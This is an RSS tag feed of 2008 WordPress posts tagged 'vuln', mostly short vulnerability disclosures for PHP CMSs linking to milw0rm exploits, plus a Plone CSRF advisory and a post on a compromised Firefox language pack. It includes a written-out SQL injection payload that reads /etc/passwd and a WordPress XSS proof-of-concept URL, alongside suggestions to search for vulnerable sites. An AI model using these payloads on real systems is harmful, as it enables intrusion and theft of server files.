<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress.com" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>vuln &amp;laquo; WordPress.com Tag Feed</title>
	<link>http://wordpress.com/tag/vuln/</link>
	<description>Feed of posts on WordPress.com tagged "vuln"</description>
	<pubDate>Fri, 25 Jul 2008 16:47:52 +0000</pubDate>

	<generator>http://wordpress.com/tags/</generator>
	<language>en</language>

<item>
<title><![CDATA[dno]]></title>
<link>http://irk4z.wordpress.com/?p=31</link>
<pubDate>Tue, 24 Jun 2008 12:45:32 +0000</pubDate>
<dc:creator>irk4z</dc:creator>
<guid>http://irk4z.wordpress.com/?p=31</guid>
<description><![CDATA[W ostatnim czasie zapanował na milw0rm straszny natłok publikacji. Nic dziwnego, w końcu skończy]]></description>
<content:encoded><![CDATA[<p>W ostatnim czasie zapanował na milw0rm straszny natłok publikacji. Nic dziwnego, w końcu skończyła się szkoła, ludzie mają więcej czasu na jakieś swoje audyty. Ale niestety ilość publikacji nie idzie w parze z ich jakością. I tak: mamy mnóstwo publikacji błędów w stylu <em>"nieznany-i-nieuzywany CMS Multiple Vulnerabilities"</em> w nieużytecznych skryptach używanych najczęściej na kilku stronach w jakimś Maroku czy Republice Konga. Jest naprawdę mało osób które starają się trochę potrudzić i nie szukać błędów w byle czym.</p>
<p>Może też powinienem zacząć publikować dziennie po 10-12 podatności?</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Cross-Site Request Forgery en Plone 3.0.x]]></title>
<link>http://julianrdz.wordpress.com/?p=191</link>
<pubDate>Tue, 17 Jun 2008 19:52:44 +0000</pubDate>
<dc:creator>Julián Rodríguez</dc:creator>
<guid>http://julianrdz.wordpress.com/?p=191</guid>
<description><![CDATA[Se ha encontrado una vulnerabilidad en Plone 3.0.x que podría ser explotada por un atacante remoto ]]></description>
<content:encoded><![CDATA[<p>Se ha encontrado una vulnerabilidad en Plone 3.0.x que podría ser explotada por un atacante remoto para realizar ataques de cross-site request forgery (XSRF).</p>
<p>Plone es un Sistema de Gestión de Contenidos (CMS) de código abierto, basado en Zope y programado en Python. Dispone un entorno gráfico tipo web y permite múltiples funciones, llegando a utilizarse frecuentemente como CRM.</p>
<p>La vulnerabilidad está confirmada para las versiones 3.0.x y no afectaría a las versiones 3.1.x. La vulnerabilidad de cross-site request forgery (XSRF) o falsificación de peticiones entre sitios, se basa en explotar la confianza que un determinado sitio web tiene con un usuario. Un atacante remoto podría explotar este problema para cambiar ciertas configuraciones de seguridad de un usuario que se conecta con una sesión válida en Plone.</p>
<p>Se recomienda instalar el parche que solventa la vulnerabilidad para las versiones 3.0.x, disponible desde:<br />
http://plone.org/products/plone-hotfix/releases/CVE-2008-0164/PloneHotfix-CVE-2008-0164.tar.gz</p>
<p>O instalar la versión 3.1.2 de plone, disponible desde:<br />
http://plone.org/download<br />
<strong><br />
<span style="text-decoration:underline;"><span style="text-decoration:underline;">Más Información:</span></span></strong></p>
<p>Plone Hotfix CVE-2008-0164<br />
<a href="http://plone.org/products/plone-hotfix/releases/CVE-2008-0164" target="_blank">http://plone.org/products/plone-hotfix/releases/CVE-2008-0164</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Mambo &lt;= 4.6.4 Remote File Inclusion Vulnerability]]></title>
<link>http://irk4z.wordpress.com/?p=30</link>
<pubDate>Sat, 14 Jun 2008 06:00:51 +0000</pubDate>
<dc:creator>irk4z</dc:creator>
<guid>http://irk4z.wordpress.com/?p=30</guid>
<description><![CDATA[Programiści Mambo nie przejrzeli dokładnie kodu swojego skryptu, zostawili możliwość zdalnego d]]></description>
<content:encoded><![CDATA[<p>Programiści <a title="Mambo 4.6.4" href="http://mambo-foundation.org/">Mambo</a> nie przejrzeli dokładnie kodu swojego skryptu, zostawili możliwość zdalnego dołączenia swojego skryptu. Exploit działa gdy register_globals == ON. <a title="Mambo 4.6.4 exploit remote file inclusion" href="http://milw0rm.com/exploits/5808">Tutaj znajduje się link do mojej publikacji</a> na milw0rm.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[CMSimple 3.1 Local File Inclusion / Arbitrary File Upload]]></title>
<link>http://irk4z.wordpress.com/?p=28</link>
<pubDate>Sat, 31 May 2008 09:22:00 +0000</pubDate>
<dc:creator>irk4z</dc:creator>
<guid>http://irk4z.wordpress.com/?p=28</guid>
<description><![CDATA[&#8220;Powered by CMSimple&#8221;, sprawdzcie w wyszukiwarce search.yahoo.com . Podatnych stron jest]]></description>
<content:encoded><![CDATA[<p>"Powered by CMSimple", sprawdzcie w <a title="wyszukiwarka yahoo" href="http://search.yahoo.com">wyszukiwarce search.yahoo.com</a> . Podatnych stron jest naprawdę dużo :/ Nie ma się co później dziwić że w internecie na każdym kroku można złapać jakiegoś robaka. <a title="CMSimple exploit" href="http://milw0rm.com/exploits/5700">Exploit opublikowany</a> na milw0rm.com</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox Vietnamese Vulnerability]]></title>
<link>http://msbasic.wordpress.com/?p=31</link>
<pubDate>Sun, 11 May 2008 14:47:04 +0000</pubDate>
<dc:creator>msbasic</dc:creator>
<guid>http://msbasic.wordpress.com/?p=31</guid>
<description><![CDATA[Hello, Folks!
Detected by many pplz and AVs (also Mozilla company detected), you may be under malici]]></description>
<content:encoded><![CDATA[<p>Hello, Folks!</p>
<p>Detected by many pplz and AVs (also Mozilla company detected), you may be under malicious use... If you downloaded vietnamese pack add-on for Mozilla Firefox (I barely use Firefox so I'm not infected), you may be under malicious use /!DONT BE ALARMED!\, this may be a weak or medium type vulnerability that will show up some pop-ups (Maybe so much popups depending of wat sites you visit). I'm scanning now, for more information go to <a href="http://blog.mozilla.com/security/2008/05/07/compromised-file-in-vietnamese-language-pack-for-firefox-2/">Mozilla's Blog Article about this vulnerability</a>. I will update this article l8r when I found out more, Read the next to know more about the vulnerability:</p>
<p><img src="http://pandalabs.pandasecurity.com/blogs/images/PandaLabs/2008/05/08/01.JPG" alt="Vulnerability in Firefox" width="357" height="60" /></p>
<p><span style="font-family:tahoma,arial,helvetica,sans-serif;">The files which contain that malicious code are detected as W32/Xorer.T.</span></p>
<p><span style="font-family:tahoma,arial,helvetica,sans-serif;">This instruction resolves to: </span><span style="font-family:tahoma,arial,helvetica,sans-serif;"><em>http://js.k0102.com/01.asp</em></span><span style="font-family:tahoma,arial,helvetica,sans-serif;"> , don’t worry because this URL is currently offline.</span></p>
<p><span style="font-family:tahoma,arial,helvetica,sans-serif;">The question is: how can anybody be sure that their computer is malware free?</span></p>
<p><span style="font-family:tahoma,arial,helvetica,sans-serif;">You can check it in any AV online scanner</span><span style="font-family:tahoma,arial,helvetica,sans-serif;">.</span></p>
<p>Reproducible: Always</p>
<p>Steps to Reproduce:<br />
1. Go to <a href="http://addons.mozilla.org/firefox/addon/5954">http://addons.mozilla.org/firefox/addon/5954</a><br />
2. Save the xpi file<br />
3. Scan that file with Avast, Kaspersky or any antivirus you have, 2/3 will<br />
detect it.</p>
<p>UPDATE: A totally Hex Editor Scan Has been doing by unixrange (we're just partners) Watch video on <a href="http://www.youtube.com/watch?v=jDMHp2HjpBQ">http://www.youtube.com/watch?v=jDMHp2HjpBQ</a></p>
<p>Scans performed by me:</p>
<p><img src="http://img390.imageshack.us/img390/3826/27997515tj0.png" alt="THexT Edit" width="650" height="335" /></p>
<p><img src="http://img241.imageshack.us/img241/417/58770536zl4.png" alt="THexT Suspicious chrome code" width="651" height="337" /></p>
<p><img src="http://img118.imageshack.us/img118/3251/97704046eo8.png" alt="HeX EdIt" width="650" height="335" /></p>
<p><img src="http://img147.imageshack.us/img147/6674/30920384rh2.png" alt="ASM Edit" width="529" height="228" /></p>
<p>What i've scanned, it says it makes a chrome dirctory and acess it to make it as the vuln temporary folder, but I'm not really sure about it, some codes make me confused!</p>
<p>So be aware, I Showed You the danger...</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[phpBP &lt;= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability]]></title>
<link>http://irk4z.wordpress.com/?p=19</link>
<pubDate>Sun, 16 Mar 2008 18:48:35 +0000</pubDate>
<dc:creator>irk4z</dc:creator>
<guid>http://irk4z.wordpress.com/?p=19</guid>
<description><![CDATA[Znalazłem podatność w phpbp w najnowszej wersji, ze wszystkimi fixami, błąd banalny, zwykłe pr]]></description>
<content:encoded><![CDATA[<p>Znalazłem podatność w <a href="http://www.phpbp.com/" title="phpbp portal">phpbp</a> w najnowszej wersji, ze wszystkimi fixami, błąd banalny, zwykłe przeoczenie programisty zamiast $_GET['id'] filtrował $_POST['id'].. Ogólnie kod skryptu ciekawy, choć jakbym dłużej nad nim posiedział to zapewne znalazł bym jeszcze kilka błędów. Brawo dla supportu phpbp (szczególnie dla Leszka Piątka) za szybkie wydanie odpowiedniego patcha ;) <a href="http://milw0rm.com/exploits/5263" title="phpBP &#60;= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability">Link do podatności na milw0rmie</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[fuzzylime cms &lt;= 3.01 Remote File Inclusion Vulnerability]]></title>
<link>http://irk4z.wordpress.com/?p=17</link>
<pubDate>Sat, 15 Mar 2008 08:07:17 +0000</pubDate>
<dc:creator>irk4z</dc:creator>
<guid>http://irk4z.wordpress.com/?p=17</guid>
<description><![CDATA[Sprawdziłem fuzzylime cms pod względem błędów i opublikowałem najważniejszy, który dostrzeg]]></description>
<content:encoded><![CDATA[<p>Sprawdziłem <a href="http://cms.fuzzylime.co.uk/" title="fuzzylime cms bug exploit">fuzzylime cms</a> pod względem błędów i <a href="http://milw0rm.com/exploits/5260" title="fuzzylime cms &#60;= 3.01 Remote File Inclusion Vulnerability">opublikowałem najważniejszy</a>, który dostrzegłem. Błąd znajduje się w pliku <b>/code/display.php. </b>Wywołany z innego kontekstu, powoduje ze można dołączyć zdalnie plik. Poza tą podatnością znalazłem jeszcze kilka LFI, których na razie nie publikuje.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[phpSimpleGallery Version 1.0 sql injectin]]></title>
<link>http://sniper456.wordpress.com/2008/01/15/phpsimplegallery-version-10/</link>
<pubDate>Tue, 15 Jan 2008 19:46:31 +0000</pubDate>
<dc:creator>sniper456</dc:creator>
<guid>http://sniper456.wordpress.com/2008/01/15/phpsimplegallery-version-10/</guid>
<description><![CDATA[[code]Advisory #00001
######################################
# phpSimpleGallery Version 1.0  sql in]]></description>
<content:encoded><![CDATA[<p>[code]Advisory #00001</p>
<p>######################################<br />
# phpSimpleGallery Version 1.0  sql injection#<br />
######################################</p>
<p>Autor:Sniper456</p>
<p>Contact:Sniper456[at]gmail.kom</p>
<p>Greetss: PescaoDeth, Vampirin456 and my chilean people ;)</p>
<p>**SQL:<br />
gallery.php?page=4&#38;eventID=96[inyecta]</p>
<p>**Example:<br />
gallery.php?page=4&#38;eventID=96/**/union/**/select/**/1,load('/etc/passwd'),3,4,5,6,7,8,9--</p>
<p>Dork: fuck ;)</p>
<p>######################################</p>
<p># Fro000M chiLe my frieeeenD! 2004   #</p>
<p>######################################[/code]</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA["powered by jPORTAL 2 &amp; UserPatch" || "powered by jPORTAL 2"]]></title>
<link>http://irk4z.wordpress.com/2007/12/29/powered-by-jportal-2-userpatch-powered-by-jportal-2/</link>
<pubDate>Sat, 29 Dec 2007 18:26:18 +0000</pubDate>
<dc:creator>irk4z</dc:creator>
<guid>http://irk4z.wordpress.com/2007/12/29/powered-by-jportal-2-userpatch-powered-by-jportal-2/</guid>
<description><![CDATA[^ zobaczcie w googlach te dorki i zastanówcie się co by było gdyby istniał uniwersalny sploit na]]></description>
<content:encoded><![CDATA[<p>^ zobaczcie w googlach te dorki i zastanówcie się co by było gdyby istniał uniwersalny sploit na owy skrypt ;] masakra... jPortal od początku był dziurawy..</p>
<p>dzisiaj (a własciwie wczoraj) znalazłem kilka podatnosci w jPORTALU z poprawkami UserPatch; na razie <a href="http://milw0rm.com/exploits/4807" title="jPORTAL 2.3.1 &#38; UserPatch (forum.php) Remote PHP Code Execution Exploit">publikuje jedną</a>, chyba najbardziej krytyczną.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[PNphpBB2 &lt;= 1.2i (printview.php phpEx) Local File Inclusion Vuln]]></title>
<link>http://irk4z.wordpress.com/2007/12/27/pnphpbb2-12i-printviewphp-phpex-local-file-inclusion-vuln/</link>
<pubDate>Thu, 27 Dec 2007 00:48:02 +0000</pubDate>
<dc:creator>irk4z</dc:creator>
<guid>http://irk4z.wordpress.com/2007/12/27/pnphpbb2-12i-printviewphp-phpex-local-file-inclusion-vuln/</guid>
<description><![CDATA[PNphpBB2 podatne na lokalne włączenie pliku ;] Śmieszny skrypcik, Kacper znalazł w nim dziure w ]]></description>
<content:encoded><![CDATA[<p>PNphpBB2 podatne na lokalne włączenie pliku ;] Śmieszny skrypcik, Kacper znalazł w nim dziure w czerwcu tego roku, miesiąc później Coloss. Dużo stron stoi na tym sofcie, w przeciągu kilku minut znalazłem przez google sześć podatnych stron, a zapewniam że jest ich więcej. Poza tym jest jeszcze LFI w pninit.php analogicznie w zmiennej phpEx. Podatność możecie zobaczyć na milw0rm.com lub tutaj: <a href="http://irk4z.wordpress.com/files/2007/12/sploitpnphpbb2.txt" title="PNphpBB2 &#60;= 1.2i (printview.php phpEx) Local File Inclusion Vuln">sploitpnphpbb2.txt</a> Ok idę spać..</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[WordPress 2.2 XSS]]></title>
<link>http://southerns.wordpress.com/2007/06/14/wordpress-22-xss/</link>
<pubDate>Thu, 14 Jun 2007 15:37:54 +0000</pubDate>
<dc:creator>javik</dc:creator>
<guid>http://southerns.wordpress.com/2007/06/14/wordpress-22-xss/</guid>
<description><![CDATA[From: &#8220;John Smith&#8221; &lt;zamolx3@gmail.com&gt;
To: full-disclosure@lists.grok.org.uk, bugt]]></description>
<content:encoded><![CDATA[<p>From: "John Smith" &#60;zamolx3@gmail.com&#62;<br />
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com<br />
Subject: Wordpress default theme XSS (admin) and other problems<br />
Date: Fri, 8 Jun 2007 16:15:38 +0300</p>
<p>There is an XSS in the Wordpress default theme. Tested on WordPress version 2.2</p>
<p>Filename functions.php, line 387.<br />
Code:</p>
<p><code>&#60;form style="display: inline" method="post" name="hicolor"<br />
id="hicolor" action="&#60;?php echo $_SERVER['REQUEST_URI']; ?&#62;"&#62;</code></p>
<p>$_SERVER['REQUEST_URI'] is directly echoed to the user.</p>
<p>This problem can be exploited if the adminstrator is logged in.</p>
<p>Sample exploit URL.<br />
<code>http://www.example.com/wp-admin/themes.php?page=functions.php&#38;zmx"&#62;&#60;script&#62;alert(1)&#60;/script&#62;</code></p>
<p>There are other XSS vulnerabilities in popular Wordpress themes.<br />
More details on http://www.xssnews.com/</p>
]]></content:encoded>
</item>

</channel>
</rss>
